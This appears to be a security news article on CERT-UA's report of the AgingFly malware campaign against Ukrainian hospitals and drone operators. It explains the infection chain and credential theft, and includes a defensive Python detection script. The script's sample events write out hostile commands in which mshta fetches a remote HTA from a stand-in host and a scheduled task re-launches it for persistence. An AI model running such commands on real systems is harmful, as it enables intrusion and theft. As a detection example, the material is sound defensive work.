
Apr 17, 2026 · 8 min read

AgingFly Malware Hits Ukrainian Hospitals and Drone Operators—It Writes Its Own Code After Landing

CERT-UA is warning about a new threat actor that disguises itself as humanitarian aid. The malware arrives nearly empty and downloads its real commands as C# source code, compiling them inside the victim's machine.

[Image: A dimly lit hospital corridor at night with computer screens glowing at a nurses' station]

What CERT-UA Found

Ukraine's Computer Emergency Response Team (CERT-UA) tracked a new threat cluster, labeled UAC-0247, that has been running an active campaign since early 2026 against Ukrainian clinical hospitals, municipal emergency ambulance services, local government authorities, and personnel inside the Defense Forces, including first-person-view (FPV) drone operators. Activity intensified between March and April 2026.

The centerpiece of the campaign is a custom C# remote access tool named AgingFly, paired with a set of supporting utilities with names like SilentLoop, ChromElevator, ZAPiDESK, and RavenShell. Together they form a kit that pivots quickly from initial email delivery into deep credential theft, messaging compromise, and network movement. CERT-UA's reporting, corroborated by BleepingComputer and The Record, describes about a dozen confirmed incidents so far, though the true victim count is almost certainly higher.

The Humanitarian Aid Lure

The attack opens with an email framed as a humanitarian aid proposal. Targets working inside hospitals, ambulance dispatch centers, and local government are exactly the population most likely to click a humanitarian offer without a second thought. The emails include a link that either routes to a convincingly AI-generated fake aid organization website or, more alarmingly, to a legitimate third-party site that the attackers have quietly injected with a cross-site scripting payload.

Clicking the link downloads a ZIP archive containing a Windows shortcut (LNK) file. Opening the shortcut silently launches mshta.exe, Microsoft's HTML Application host, which reaches back to the attackers' server, retrieves an HTA file, and executes it. A scheduled task is then dropped to keep the malware running after reboot. The same UAC-0247 operators have also been observed distributing malware through Signal, using a March 10 decoy archive named bachu.zip that impersonates legitimate drone operator software aimed at Ukraine's Defense Forces.

What Makes AgingFly Different

Most RATs ship with their command set baked in. Defenders can inspect the binary, pull the strings, and write detections for the exact instructions the malware knows how to run. AgingFly throws that approach out.

The core implant is almost empty. Its command handlers are not present in the file on disk. Instead, once installed, AgingFly asks its command-and-control (C2) server for C# source code, then uses the System.CodeDom and related .NET compiler APIs to compile that source into executable code directly inside the infected machine. The final, meaningful behavior of the malware is assembled on the fly, in memory, after infection.

That design means two things for defenders. First, static analysis of the installer reveals very little about what the malware actually does in a given environment. Second, operators can push radically different behavior to different victims without ever changing the file on disk. A sample that looks harmless in a sandbox can be turned into a keylogger, screenshot grabber, or lateral movement tool by sending new source text over the network. AgingFly's C2 channel uses WebSocket connections encrypted with AES-CBC and static keys, which makes traffic blend into normal application behavior more easily than raw TCP beacons.

Stealing Passwords From Chrome Without Admin Rights

Once AgingFly is running, the operators typically deploy ChromElevator, an open source credential extraction tool, against Chromium-based browsers like Chrome, Edge, Brave, and Opera. ChromElevator decrypts the cookie and saved password store without requiring administrator privileges, which is notable because Chrome's newer protections were specifically designed to force attackers to escalate before touching the credential vault. The technique exploits a weakness in how the Chromium data protection API can be invoked by user-level processes.

The output is the same crown jewels a typical infostealer returns: site logins, email and cloud account passwords, session cookies that can be replayed to bypass multi-factor authentication, and autofilled credit card and address data. Chrome's new Device Bound Session Credentials system, which ties cookies to specific hardware, mitigates some of the cookie replay risk when sites adopt it, but most platforms have not rolled out the protection yet.

WhatsApp for Windows Becomes a Target

AgingFly's operators pair ChromElevator with ZAPiDESK, an open source forensic tool normally used by incident responders to parse WhatsApp Desktop artifacts. ZAPiDESK decrypts the local WhatsApp databases, which contain message history, contact lists, media, and device identifiers for every paired phone. A successful run gives the attacker the victim's chat archive and enough identity data to impersonate the account in follow-on social engineering.

That matters for hospitals and emergency services because WhatsApp is the default day-to-day coordination tool for medics, dispatchers, and local government staff across Ukraine and much of eastern Europe. A compromised account does not just expose patient discussions. It lets the attacker send believable messages, framed in the real voice of the real user, to every contact in the address book, including vendors, ministries, and family members.

Lateral Movement and Persistence

Once inside a network, UAC-0247 has been observed deploying a layered toolkit. SilentLoop is a PowerShell persistence script that rotates its command-and-control address by reading from a Telegram channel, with backup channels in case any one account is shut down. RavenShell establishes encrypted TCP connections using lightweight 9-byte XOR keys, optimized to evade network-level detection while still being fast to deploy.

For reconnaissance and pivoting, operators use a mix of legitimate administrator tools, including rustscan for fast port sweeps, ligolo-ng for SOCKS5 tunneling back to the attacker, and chisel for TCP-over-HTTP tunnels that punch through most outbound proxies. The combination turns a single hospital endpoint into an on-network jump box for further intrusion into medical records systems, government email, or connected defense networks.

CERT-UA's Defensive Guidance

CERT-UA's advisory is practical and applies well beyond Ukraine. The recommended controls focus on limiting the legacy Windows script execution paths the malware depends on.

  • Block execution of .LNK, .HTA, and .JS files from email, Downloads, and user profile directories using AppLocker, Windows Defender Application Control, or equivalent endpoint policy.
  • Restrict or disable mshta.exe, wscript.exe, and cscript.exe through Microsoft's attack surface reduction rules, which have existed for years but remain disabled in most environments.
  • Enable constrained language mode for PowerShell to blunt scripts like SilentLoop that rely on dynamic invocation.
  • Monitor for unsigned .NET compilation events in process logs. On a normal workstation, csc.exe runs rarely and almost never under a browser or email client. A spike is a strong indicator of AgingFly-style in-memory compilation.
  • Audit stored credentials in Chromium browsers. If Chrome or Edge password sync is used, the device becomes a single point of failure for every saved account. Migrating to a dedicated password manager with a separate master password reduces blast radius when a machine is compromised.
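The monitoring item above and the in-memory compilation behavior described under "What Makes AgingFly Different" both reduce to process-chain checks. The script below is an added example written for this article, not code from CERT-UA or from the UAC-0247 toolkit. It assumes Sysmon-style process-creation fields (Image, ParentImage, CommandLine), and it assumes the command-line shape the .NET Framework CodeDom provider typically produces when it compiles at run time (csc.exe driven by a .cmdline response file under %TEMP%). All sample events, paths and hostnames are constructed; the implant path is a placeholder and hostnames use the reserved .invalid domain.

```python
"""Behavioural detection for the process chain this article describes, run over
constructed Sysmon-style process-creation events (Event ID 1 fields Image,
ParentImage, CommandLine). The events below are constructed samples, not
telemetry from any real incident; hostnames use the reserved .invalid TLD."""
import re

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
DOTNET_COMPILERS = {"csc.exe", "vbc.exe"}
# Parents under which a compiler launch is routine on a developer machine.
EXPECTED_COMPILER_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Assumed shape of the csc.exe command line that the .NET Framework CodeDom
# provider produces when it compiles source at run time: a response file in %TEMP%.
CODEDOM_RESPONSE_FILE = re.compile(
    r'/noconfig\s+/fullpaths\s+@"?[^"]*\\AppData\\Local\\Temp\\[^"]*\.cmdline',
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    hits = []

    # Rule 1: the LNK -> mshta.exe step. A script host pulling its content from a
    # URL is the initial-access behaviour described in the article.
    if image in SCRIPT_HOSTS and REMOTE_URL.search(cmd):
        hits.append("script_host_remote_content")

    # Rule 2: persistence. schtasks.exe creating a task whose action is a script host.
    lowered = cmd.lower()
    if image == "schtasks.exe" and "/create" in lowered and any(h in lowered for h in SCRIPT_HOSTS):
        hits.append("scheduled_task_runs_script_host")

    # Rule 3: run-time .NET compilation outside a build tool, the footprint of
    # an implant fetching C# source and compiling it on the victim.
    if image in DOTNET_COMPILERS and parent not in EXPECTED_COMPILER_PARENTS:
        if CODEDOM_RESPONSE_FILE.search(cmd):
            hits.append("codedom_runtime_compilation")
        if parent in SCRIPT_HOSTS:
            hits.append("compiler_spawned_by_script_host")

    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Evaluate every event; map event index -> rules hit, omitting clean events."""
    results = {}
    for idx, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            results[idx] = hits
    return results


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 0: user opens the shortcut from the ZIP; explorer.exe launches mshta.exe with a URL
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://aid-portal.invalid/proposal.hta"},
    # 1: the HTA registers a logon task that re-launches mshta.exe
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'schtasks.exe /Create /SC ONLOGON /TN Updater /TR "mshta.exe https://aid-portal.invalid/proposal.hta"'},
    # 2: the implant (placeholder path) compiles server-supplied C# through CodeDom
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\PLACEHOLDER_IMPLANT.exe",
     "CommandLine": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q2f0yn1u.cmdline"'},
    # 3: benign: MSBuild compiling a project with a normal response file
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.csproj.rsp"'},
    # 4: benign: Chrome started from the taskbar
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

Rule 3 is the one that survives payload changes: whatever source the C2 pushes, the compiler still has to run, and on a workstation that is not a build machine its parent process is the thing to look at. The EXPECTED_COMPILER_PARENTS allow-list should be tuned per fleet; a hospital endpoint will usually have no legitimate entry at all.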

Why the Target Set Matters

UAC-0247 has not been formally attributed to a nation-state in public reporting so far. The target selection, however, follows a pattern familiar from other wartime espionage campaigns against Ukraine: medical infrastructure, local administrators, and military-adjacent personnel, not the general public. Ambulance dispatch and clinical hospitals are high-value because their communications reveal casualty numbers, unit movements, and medical supply chains. Drone operators are high-value for obvious reasons.

For hospitals in neighboring countries that rely on the same software stack, the lesson is not to treat this as someone else's war. The techniques will transfer. ChipSoft ransomware hit 80% of Dutch hospitals' patient records earlier this month, and the AgingFly playbook is explicitly designed to work against any organization where Chrome stores passwords, WhatsApp handles coordination, and users are conditioned to click humanitarian-looking email attachments.

The Broader Trend

AgingFly is the latest example of a modular, live-updating intrusion kit that combines commodity open source tools with a bespoke C# implant. The design assumes it will be detected eventually and optimizes instead for rapid behavior changes and quiet credential exfiltration before that happens.

For defenders, the takeaway is that signature-based antivirus is not enough against malware that generates its own executable logic on demand. Detection has to move up the stack to behavioral patterns: script interpreters launching compilers, browsers writing to unusual paths, .NET processes making outbound WebSocket connections to domains with no reputation. Those are the indicators that survive whatever new payload UAC-0247 decides to push tomorrow.
